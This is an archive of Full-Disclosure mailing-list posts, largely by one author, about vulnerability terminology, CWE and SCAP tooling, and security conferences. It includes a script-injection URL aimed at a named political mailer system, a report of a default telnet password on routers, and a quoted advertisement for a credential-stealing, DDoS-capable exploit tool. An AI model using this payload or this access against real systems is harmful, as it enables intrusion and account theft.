Re: [Full-disclosure] Google vulnerabilities with PoC
Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do the things we *really* don't want it to do. In this spirit, the term vulnerability is generally reserved for behaviors that meet all of the following criteria: 1) The behavior must have negative consequences for at least one of the legitimate stakeholders (users, service owners, etc), 2) The consequences must be widely seen as unexpected and unacceptable, 3) There must be a realistic chance of such a negative outcome, 4) The behavior must introduce substantial new risks that go beyond the previously accepted trade-offs. If we don't have that, we usually don't have a case, no matter how clever the bug is. Cheers (and happy hunting!), /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A question for the list - WordPress plugin inspections
It is valuable I concur (# line of code, file names and CVE submission). I would also suggest to use common classifications (or a mapping) such as OWASP TOP10, WASC, CWE (CAPEC) for your criterias. Providing details regarding the methodology or/and tools used for the assessment would be also valuable. (i.e. Checklist, RIPS, https://labs.portcullis.co.uk/tools/wordpress-build-review-tool/ ) Thank you Best regards 2014-02-19 Seth Arnold seth.arn...@canonical.com: On Wed, Feb 19, 2014 at 06:40:51PM +, Harry Metcalfe wrote: We write and publish light-touch inspections of WordPress plugins that we do for our clients. They are just a guide - we conduct some basic checks, not a thorough review. Would plugins which fail this inspection be of general interest to the list and therefore worth posting, as we would a vulnerability? Here's an example report: https://security.dxw.com/plugins/gd-star-rating-1-9-22/ Grateful for a steer... That's a very nice summary view, but it'd be more useful in this medium if you included the lines of code that introduce the vulnerabilities. Most useful would be to coordinate with authors and MITRE for CVE numbers for the issues you find to ensure the issues aren't forgotten about or otherwise ignored. Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A question for the list - WordPress plugin inspections
Yes btw you can simply submit by email to osvdb, packetstorm, etc. but I'm pretty sure they will catch it now ;) 2014-02-20 Harry Metcalfe ha...@dxw.com: Hi Jerome, The criteria are here: https://security.dxw.com/about/plugin-inspections/ Is that what you mean? I agree using a common classification would be good. I'll have a look into that. As mentioned before, though - these are not vulnerability reports. We do those too: https://security.dxw.com/advisories/xss-and-csrf-in-user-domain-whitelist-v1-4/ and they are more detailed. Inspections are more about code smell, if you know what I mean. So there aren't specific files, lines, etc. Harry On 20/02/2014 08:39, Jerome Athias wrote: It is valuable I concur (# line of code, file names and CVE submission). I would also suggest to use common classifications (or a mapping) such as OWASP TOP10, WASC, CWE (CAPEC) for your criterias. Providing details regarding the methodology or/and tools used for the assessment would be also valuable. (i.e. Checklist, RIPS, https://labs.portcullis.co.uk/tools/wordpress-build-review-tool/ ) Thank you Best regards 2014-02-19 Seth Arnold seth.arn...@canonical.com: On Wed, Feb 19, 2014 at 06:40:51PM +, Harry Metcalfe wrote: We write and publish light-touch inspections of WordPress plugins that we do for our clients. They are just a guide - we conduct some basic checks, not a thorough review. Would plugins which fail this inspection be of general interest to the list and therefore worth posting, as we would a vulnerability? Here's an example report: https://security.dxw.com/plugins/gd-star-rating-1-9-22/ Grateful for a steer... That's a very nice summary view, but it'd be more useful in this medium if you included the lines of code that introduce the vulnerabilities. Most useful would be to coordinate with authors and MITRE for CVE numbers for the issues you find to ensure the issues aren't forgotten about or otherwise ignored. Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security by destruction
Hi I would like to know if you guys have links/background about a security by destruction principle? This question follows the behavior observed recently by a bank (I won't reveal tHiS Big bank name), multiple times (including but not limited to my case) where they simply block, retain and destroy/reissue (of course with customer charges) without clear or efficient notification/check a credit card when used abroad or for international transfer. I still didn't read small lines in my contract, But wonder if some of you had observed similar approaches to ensure the security of customers/consumers? Thanks Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] whatsapp opening url in background
Hi, fyi I've seen Chrome (on Mac OSX) doing at least two requests to the first domains of the results of a search It appears to be like a pre-cache functionality, however I didn't investigate more (so I don't know if it is related to pre-load / Do Not Track) I wonder how it could be used in combination with techniques like google bombing for tracking or malware... Regards /JA 2013/11/15 Frank Habermann lordla...@lordlamer.de: Hi, I have been talking with WhatsApp about this issue during some days and this error is solved in last version *2.11.134.* I have been written an advisory for this: http://foosec.com/docs/whatsapp.html Thanks for the info. Frank ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CWEs translation
Hi list, I finished the translation into french of all available CWEs (Titles + Descriptions). We use it for our CERT. I should soon share this work with french CERTs, but I would like to know if others could provide a translation in other languages? (I know some spain guys are working on it) Thanks My 5 euro cents -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS in UMP-Sarkozy mailer system
tk3.rylyo.com/14/usb.htm?p=cfmel=jer...@netpeas.comadm=scriptalert('p0wned');/scriptl=fr
smime.p7s
Description: Signature cryptographique S/MIME
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MoroccoTel Box Default Open Telnet Password
: 0500010002000300040005 Main Feature Bits : 86 Other Feature Bits : 93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 MT882a 41.141.*.* - e 41.141.*.* - ther config --- NDIS CONFIGURATION BLOCK type=1 flags=0001 Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2 task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2 board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0 board-pp (8042c8f0) 804273fc line-pp (8042c8f4) 8042956c chann-pp (8042c8f8) 804bf8a4 804bfe34 --- BOARD DISPLAY --- ID slot# n-line n-chann status line-cfg chann-cfg 00 0 120001 8042c8bc8042c8d0 --- LINE DISPLAY --- ID line# board-id n-chann chann-cfg 00 1 00 2 8042c8d0 --- CHANNEL DISPLAY - ID chan# line-id board-id address name 00 1 00 00804bf8a4 enet0 01 2 00 00804bfe34 enet1 MT882a -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca Mobile: +212665346454 www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
Hi, I think that people here would be more interested by the (new?) techniques you're using in your tool than by your own (not documented?) implementation. ie: are you using MSF browser autopwn technique for browser control? (Or, will we have to spend individually 3 days to review and test your tool?) My 2 cts /JA Le 23/04/2012 21:52, runlvl a écrit : Exploit Pack - Web Security Edition This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more. Demo: http://www.youtube.com/watch?v=B_AYyRFNokI Main features: - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin - Session persistence - 0day exploits included - Remote browser control - DDoS by creating botnets - Launch remote exploits - Steal credentials Questions? supp...@exploitpack.com Official site: http://exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Opcodes Database Revival
Hi List, WANTED: one (free/available) .Net programmer I did a research on Windows Opcodes (return addresses) database https://en.wikipedia.org/wiki/Metasploit_Project#Opcode_Database http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html My tools/results should be soon published (BlackHat website / Packetstorm...) Anyway, to publish the source code, i would like to collaborate with a .Net programmer to share a better/clean/more understable code. Anyway, in short it is an update of http://insecure.org/stf/smashstack.html -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
Sorry that the following text is in french. You can probably find a translator to understand it. Cheers Take Care /JA Message original Sujet: Re: Operation Bring Peace To Machines Date : Sat, 18 Feb 2012 12:54:50 -0500 De :Richard Stallman r...@gnu.org Répondre à :r...@gnu.org Pour : Jerome Athias jer...@netpeas.com Les erreurs, ou faiblesses, dans le code des logiciels sont exploitées par des méchants. Pire encore, d'autres méchants introduisent des fonctionalités malveuillantes dans leurs programmes privateurs. Par exemple, Windows, MacOS, iOS (dans les iThings), Flash Player, Kindle, Playstation 3. Les fonctionalités dites « de sécurité » protègent les utilisateurs contre les tiers, mais seulement le logiciel libre les protège contre les développeurs. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use free telephony http://directory.fsf.org/category/tel/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
1) one typo in the french word malveuillantes it should be writen: malveillantes 2) privateurs comes from the latin word privatus; /privative software http://venezuela-us.org/2011/08/16/u-s-programmer-richard-stallman-highlights-benefits-of-free-software/ /it is just an open your mind try think just do it Happy Hacking! /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CFP] FRHACK Africa 2012 Call For Papers extended
Information here: http://www.frhack.org/frhack-cfp.php CFP extended : + 1 month *Hacker* 1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. RFC1392, the Internet Users' Glossary, usefully amplifies this as: A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. 2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming. 3. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations. /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Re: Operation Bring Peace To Machines - War Game
It's in trunk of openvas-manager. It's implemented as an XSLT. Sujet: Re: [Full-disclosure] Operation Bring Peace To Machines - War Game Date : Sat, 18 Feb 2012 20:19:58 + De :Tim Brown t...@openvas.org Pour : Jerome Athias jer...@netpeas.com OpenVAS already has a partial IVIL implementation, I know because I wrote it: ~/Development/Private/Unpublished/OpenVAS/trunk/openvas- manager/report_formats/IVIL$ ls generate IVIL.xsl Thanks very much for thinking of us, if anyone does take an interest and gets OpenVAS could you point them in my direction? Tim -- Tim Brown mailto:t...@openvas.org http://www.openvas.org/ signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
http://pfsense.bol2riz.com/downloads/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
IVIL is not EVIL http://forum.pfsense.org/index.php/topic,46401.0.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
http://code.google.com/p/capirca/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines
maybe useful for malwares? http://www.labnol.org/internet/google-dmca/19256/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Operation Bring Peace To Machines : New Info
Sorry, I am just crazy \x90 Sujet: RE: Vulnerability conceptual map (UNCLASSIFIED) Date : Sat, 18 Feb 2012 16:37:45 -0500 De :WOLFKIEL, JOSEPH L CIV DISA PEO-MA joseph.wolfk...@disa.mil Répondre à :joseph.wolfk...@disa.mil Pour : Multiple recipients of list scap-...@nist.gov Classification: UNCLASSIFIED Caveats: NONE The NetD schemas were developed with that concept in mind. We had hoped to contribute the entire body of knowledge to the community and start building automated communications based on the schemas and the relationships they document. Using SCAP names and metadata tags was a key component and gave us some early quick wins. I'd love to come to community consensus on ontological models for threat, vulnerability, device, person, incident, event, workflow, etc that we could start incorporating into SCAP standards (starting with ARF and ASR). Joseph L. Wolfkiel Engineering Group Lead DISA PEO MA/IA52 (301) 225-8820 joseph.wolfk...@disa.mil -Original Message- From: scap-...@nist.gov [mailto:scap-...@nist.gov] On Behalf Of Davidson II, Mark S Sent: Friday, February 17, 2012 7:55 AM To: Multiple recipients of list Subject: RE: Vulnerability conceptual map I think the core of the topic is turning information into action. You might have an ongoing attack, a vulnerability that needs to be patched, an exploitable configuration, or one of many other security risks. You will have varying degrees of information (as Kurt said) within each risk. Currently, an organization that can aggregate risk and threat information to a single point and have a human make a decision that is carried out in a timely manner is among the more mature organizations. Many organizations do not have all of their security information in a single place. Many organizations, once they make a security decision, have a difficult time implementing and communicating that decision. There's probably three areas of action: 1) Collect information and present it in a useful way 2) Make a decision based on that information 3) Carry out the decision #1 and #3 should be automated, and #2 should be where we spend most of our effort. SCAP and CM are within the domain of Collect/Present, and I think there have always been discussions about automating #3. Certain decisions in #2 can be automated once you have #1 and #3, but that's a ways away (in my opinion). Part of the difficulty of #3 is that networks will always be different. Network management technologies will always be different. Let's say for the sake of argument you want to block web traffic. How would you communicate that? You'd have to, at a minimum, communicate the following: inbound/outbound, applicable subnets/locations, timeframe. Specifying a port may not be enough. What about web traffic over non-standard ports? Then you'd have to use an application aware firewall. Or, what if you are trying to contain a segment of the network that has a router as it's only access? You'd have to have a uniform language that could turn a thought Block web traffic for sales - they got ANOTHER virus into a command that must be usable by a variety of devices with functionality that may or may not overlap, all in a network whose topography cannot be known when that language is written. And you have to be able to 'remove' the block when you want. I guess that was just a long way of saying 'I agree'. There's a lot of work to be done and much of it is unexplored (at least from a shared knowledge perspective). -Mark -Original Message- From: scap-...@nist.gov [mailto:scap-...@nist.gov] On Behalf Of Kurt Seifried Sent: Thursday, February 16, 2012 6:55 PM To: Multiple recipients of list Subject: Re: Vulnerability conceptual map On 02/16/2012 06:11 AM, Jerome Athias wrote: For me, The problem: we must quickly mitigate (and then remediate) vulnerabilities Existing scope: we have actually (too much?) too complicated (and incomplete) standards we have not-interoperable vulnerability tools My proposed solution: we have to act quickly to deal with the problem So the idea is to produce, and use an open, SIMPLIFIED, easy to implement and use, standard What i call IVIL v1.0 And I would like to explain, demonstrate and validate my solution I find this discussion interesting. As I see it for a vulnerability (e.g. a technical issue that can be exploited to gain access or elevate privilege) we have several options: 1) fix it with a software update (which generally relies upon a vendor(s) shipping an update) 2) use a workaround (like change file permissions, disable the specific component that is affected, etc.) 3) disable the entire thing temporarily or permanently. For example by turning it off, restricting access to a limited subset of users, replacing it with something else, etc. 4) accept the risk and continue on (e.g. denial of service attacks, have a re-mediation routine to deal with it such as restarting
Re: [Full-disclosure] Operation Bring Peace To Machines - War Game
YES WE sCAN! On Saturday 18 Feb 2012 20:29:02 Jerome Athias wrote: can you (do you want) to share to the world? thanks It's in trunk of openvas-manager. It's implemented as an XSLT. Tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Operation Bring Peace To Machines - Mission 1 (nmap2cpe)
Your sound card works perfectly. Enjoying yourself? It doesn't get any better than this! Ready to serve. Yes? My lord? What is it? http://seclists.org/nmap-dev/2010/q3/278 Good luck! /JA Ref: http://www.wowwiki.com/Quotes_of_Warcraft_II ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Operation Bring Peace To Machines - War Game
Good morning Hacker, Your mission, should you decide to accept it is to save the CyberSpace. As mentioned in the U.S. INTERNATIONAL STRATEGY FOR CYBERSPACE[1] document, we need interoperable and secure technical standards, determined by technical experts. Requirements: ~15 minutes of your time, a headset and the Boléro The Rand Strategy Assessment Center provides you the following computerised model: Software Vulnerability Mitigation Automation, (an incomplete Conceptual Map) https://corevidence.com/research/vulnerability_interoperability_ivil_v1.jpg some links extracted: [1] http://www.whitehouse.gov/blog/2011/05/16/launching-us-international-strategy-cyberspace IVIL-XML http://www.cupfighter.net/index.php/2010/10/ivil-an-xml-schema-to-exchange-vulnerability-information/ ThreadFixhttp://code.google.com/p/threadfix/ We will provide you soon IVIL v1.0, so be ready for action! i = x2ivil + ivil2x where i is interoperability and x a software (vulnerability scanner,... + waf, virtual patching system, ...) Examples: openvas2ivil nessus2ivil qualys2ivil nikto2ivil ivil2mod_security ivil2snort As always, should you or any of your I.M. Force be caught or killed, the Secretary will disavow any knowledge of your actions. This tape will always stay here. -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using HTTP referer for phishing attacks
This could be also used in some cases to Refer requests from paypal or
such payment systems when there is no/bad validation checks on an
e-commerce website.
ie:
if(Referer.Contains(paypal.com))
{ ok }
but what if i control mypaypal.com?
Le 24/01/2012 20:14, Jan Wrobel a écrit :
Hi,
Sorry if this is not new, but I didn't manage to find any mention of
such a technique.
In short: HTTP referer field contains information where the web user
is coming from, which is often a trusted site such as a web search.
Having such information, a malicious web site can use several tricks
to fool the user into thinking that he or she returned to the
referring site. In fact, the user is taken to a generic phishing site
that intercepts all data exchanged between the user, the referring
site and sites visited from the referring site.
More detailed write up with few examples is here:
http://mixedbit.org/referer.html
Cheers,
Jan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com
The computer security is an art form. It's the ultimate martial art.
smime.p7s
Description: Signature cryptographique S/MIME
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CFP] FRHACK Africa 2012 Call For Papers
- Estimated time-length of presentation and language - General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) - Any other technical requirements for your lecture - Whether you need visa to enter Morocco or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in advance. Preferrable file format for papers and slides are both PDF and also ODT/PPT for slides. Speakers are asked to hand in slides used in their lectures. PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your presentation involves advertisement of products or services please do not submit. [ - Information for speakers - ] We are looking for sponsors to cover conference's expenses. Speakers' privileges are: - Accommodation for 3 nights - Help covering travel expenses - Free pass to the conference for you and a friend - Speaker activities during, before, and after the conference - Speaker After-Party ... [ - Information for instructors - ] - 50% of the net profit of the class - Accommodation during the trainings - Free pass to the conference - Speaker activities during, before, and after the conference - Speaker After-Party ... [ - Information for sponsors - ] - If you can provide or offer materials, devices, goodies and money, please contact us at: frhack-spon...@frhack.org [ - Information for attendees - ] More information will be available soon on our website http://www.frhack.org or feel free to contact us at: frh...@frhack.org We will also celebrate our new Hacker Space and an Hacking challenge will be organized during the events. Thanks and see you soon for FHRACK. Happy Hacking! Jerome Athias, Founder, Chairman, Program Coordinator /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
I hope, dear, that the code is better than your english. Le 17/12/2010 08:26, Dave Nett a écrit : Deer List, Everything has in the title. I has to be a secret agent in the past so I know the project code. Use with awarenes. attachment: jerome_athias.vcf___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MD5 decrypter PHP Script
I did a quite similar script for oscommerce, more in a rainbowtables building way. $password = md5($salt . $plain) . ':' . $salt; http://pastebin.com/mtciPcTM Regards /JA http://www.linkedin.com/in/jeromeathias The computer security is an art form. It's the ultimate martial art. smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Suspected Spam]Security Assessment of the Internet Protocol the IETF
Hi, I still not have read all your paper, but my first word is congratulations! That's an hard job. Since a quick search didn't give a result for it, and maybe others could be interested: The AVISPA (Automated Validation of Internet Security Protocols and Applications) project aims at developing a push-button, industrial-strength technology for the analysis of large-scale Internet security-sensitive protocols and applications. This website contains all relevant information about AVISPA for project members, interested third parties and scientists worldwide. http://www.avispa-project.org/ My 2 cents for now /JA Fernando Gont a écrit : Folks, In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of National Infrastructure) published the document Security Assessment of the Internet Protocol. The motivation of the aforementioned document is explained in the Preface of the document itself. (The paper is available at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf ) Once the paper was published by CPNI, I produced an IETF Internet-Draft version of the same paper, with the intent of having the IETF publish recommendations and/or update the specifications where necessary. This IETF Internet-Draft is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's also available at the IETF I-D repository). The Internet-Draft I published was aimed at the OPSEC WG. And the Working Group is right now deciding whether to accept this document as a WG item. This is certainly a critical step. Having the OPSEC WG accept this document as a WG item would guarantee to some extent that the IETF will do something about all this, and would also somehow set a precedent in updating the specifications of core protocols and/or providing advice on security aspects of them. The call for consensus is available at: http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can voice your opinion on the relevant mailing-list sending an e-mail to op...@ietf.org . You don't need to subscribe to the mailing list to post a message (although your message will be held for moderator approval before it is distributed to the list members). The deadline for posting your opinion is January 9th (next Friday). Thanks so much! Kind regards, Fernando Gont -- Fernando Gont e-mail: ferna...@gont.com.ar || fg...@acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CFP] FRHACK 01 Call For Papers (save the dates!)
, though two international airports, EuroAirport Basel-Mulhouse-Freiburg and Lyon Saint-Exupéry International Airport, can be reached in about 2 hours. [ - Topics - ] TFT gives preference to lectures with practical demonstration. The conference staff will try to provide every equipment needed for the presentation in the case the author cannot provide them. The following topics include, but are not limited to: - Rootkits - Cryptography - Reverse engineering - Penetration testing - Web application security - Exploit development techniques - Internet, privacy and Big Brother - Telecom security and phone phreaking - Fuzzing and application security test - Security in Wi-Fi and VoIP environments - Information warfare and industrial espionage - Denial of service attacks and/or countermeasures - Analysis of virus, worms and all sorts of malwares - Technical approach to alternative operating systems - Techniques for development of secure software systems - Information about smartcard and RFID security and similars - Lockpicking, trashing, physical security and urban exploration - Hardware hacking, embedded systems and other electronic devices - Mobile devices exploitation, Symbian, P2K and bluetooth technologies - Security aspects in SCADA, industrial environments and obscure networks [ - Important dates - ] Conference and trainings 20090909-10: FRHACK trainings 20090907-08: FRHACK 1st edition Please register to our RSS to stay tuned: http://www.frhack.org/frhack.xml Deadline and submissions - Deadline for proposal submissions: 20090601 - Deadline for slides submissions: 20090701 - Notification of acceptance or rejection: 20090714 * E-mail for proposal submissions: [EMAIL PROTECTED] * Make sure to provide along with your submission the following details: - Speaker name and/or nickname, address, e-mail, phone number and general contact information - A brief but informative description about your talk - Short biography of the presenter, including organization, company and affiliations - Estimated time-length of presentation and language - General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) - Any other technical requirements for your lecture - Whether you need visa to enter France or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in advance. Preferrable file format for papers and slides are both PDF and also ODT/PPT for slides. Speakers are asked to hand in slides used in their lectures. PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your presentation involves advertisement of products or services please do not submit. Furthermore, if your talk is just I found an awesome new technic but if you want it, just go in hell! = You're not welcome at FRHACK. [ - Information for speakers - ] Please note that it's our first edition, and so we are looking for sponsors to cover conference's expenses. Speakers' privileges are: - FRHACK staff can guarantee and we will provide accommodation for 3 nights: - For each non-resident speaker we hope to be able to cover travel expenses up to EURO 1500 - For each resident speaker we might be able to cover travel expenses - Free pass to the conference for you and a friend - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks and pretty girls [ - Information for instructors - ] - 50% of the net profit of the class - 2 nights of accommodation during the trainings - Free pass to the conference - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks and much more pretty girls [ - Information for sponsors - ] - If you can provide or offer materials, devices, goodies and money, please contact us at: [EMAIL PROTECTED] [ - Other information - ] - For further information please check out our web site http://www.frhack.org (and nowhere else) It will be updated with everything regarding the conference. - If you have questions, want to send us additional material, or have problems, feel free to contact us at: [EMAIL PROTECTED] Thanks and see you soon at FHRACK! Jerome Athias, Founder, Chairman, Program Coordinator /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page
